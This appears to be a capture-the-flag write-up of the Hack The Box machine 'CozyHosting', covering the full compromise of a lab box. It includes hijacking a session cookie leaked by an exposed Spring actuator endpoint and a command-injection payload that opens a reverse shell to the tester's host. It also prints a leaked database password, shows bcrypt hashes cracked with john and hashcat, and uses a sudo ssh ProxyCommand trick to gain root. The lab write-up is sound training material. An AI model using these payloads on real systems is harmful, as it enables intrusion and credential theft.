CozyHosting

Personal Rating: Medium

Enumeration

Running an initial nmap scan:

sudo nmap -v -sC -sV <IP>

Nmap scan report for cozyhosting.htb (10.10.11.230)
Host is up (0.041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
|_http-server-header: nginx/1.18.0 (Ubuntu)

• There is is a home redirection to index.html, which is then not found.

• NiceAdmin Template, Updated: Mar 09 2023 with Bootstrap v5.2.3

• Login page at http://cozyhosting.htb/login

• Does not seem to be injectable after several scans on the username and password parameter in the POST request.

• /-error and /admin, which redirects to /login were found, but not interesting at first glance

• This request returns an empty 200 page: GET http://cozyhosting.htb/<%=42*42 %>

• This request and many others redirect to a Whitelabel Error Page: GET http://cozyhosting.htb/{42*42}

After using feroxbuster with a different wordlist we find /actuator, which grants access to an API!

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://cozyhosting.htb
 🚀  Threads               │ 128
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/spring-boot.txt
 💢  Status Code Filters   │ [400]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.0
 🤯  Header                │ Cookie:  JSESSIONID=28BDB453CA6F81483FB4D4F41B5C6316
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        1l        2w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        0l        0w        0c http://cozyhosting.htb/actuator/env/spring.jmx.enabled
404      GET        0l        0w        0c http://cozyhosting.htb/actuator/env/tz
200      GET        1l        1w       48c http://cozyhosting.htb/actuator/sessions
<SNIP>

Springboot API Enumeration

This could be a way in: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/spring-actuators

At /actuator/sessions there is this interesting entry: 0DF960B8E984BFE1591E481ED1DA02B0 "kanderson"

I could change these values in the F12 browser menu and access /admin:

At POST /executessh with the data host=cozyhosting&username=test%0Als I get this error:

OS Command Injection

http://cozyhosting.htb/admin?error=ssh: Could not resolve hostname test: Temporary failure in name resolution/bin/bash: line 2: ls@cozyhosting: command not found

So we should have a command injection possible here. This worked to read the PATH after testing around for a while:

host=cozyhosting&username=${PATH};

I then continued to test different payloads until I created a working reverse shell payload.

zz;%0A/bin/bash%09-c%09$(id)
-->    id=1001(app) gid=1001(app) uid=1001(app)

host=cozyhosting&username=s||wget%0910.10.16.5:8000/$(bash%09-i%09>%26%09/dev/tcp/10.10.16.5/1337%090>%261);

I fetched the result with metasploit and upgraded it to a meterpreter shell to make things easier

Internal Enum & Persistence

ss -tlpn revealed an interesting open port:

This port 5432 belongs to postgresql.

I created ssh keys for persistence:

ssh-keygen  
Generating public/private rsa key pair.
Enter file in which to save the key (/home/app/.ssh/id_rsa): /tmp/appuser-rsa           
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /tmp/appuser-rsa
Your public key has been saved in /tmp/appuser-rsa.pub

This did not work as the app user cannot use ssh with pubkey auth.

According to /etc/passwd there is the user postgres (and the user josh).

I found the psql pw at cloudhosting-0.0.1/BOOT-INF/classes/htb/application.properties after extracting the file which I found at /app on the server:

spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

Database Access

I created a dynamic port forwarding with metasploit and logged into the database remotely:

   name    |                           password                           | role  
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

Using ./john /HTBfolder/Boxes/HTB-CozyHosting/hashes.txt --wordlist=/usr/share/seclists/Passwords/rockyou.txt I get:

manchesterunited (?)

Using hashcat I get the same result:

hashcat -m 3200 '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' /usr/share/seclists/Passwords/rockyou.txt --show

$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited

Using this password I could log onto the server with ssh.

GTFOBin ssh

The user can execute ssh as root:

josh@cozyhosting:~$ sudo -l
[sudo] password for josh: 
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

This is called a GTFObin. Using this source I found exploitation methods for it:

ssh | GTFOBins

sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# whoami
root
# cat /root/root.txt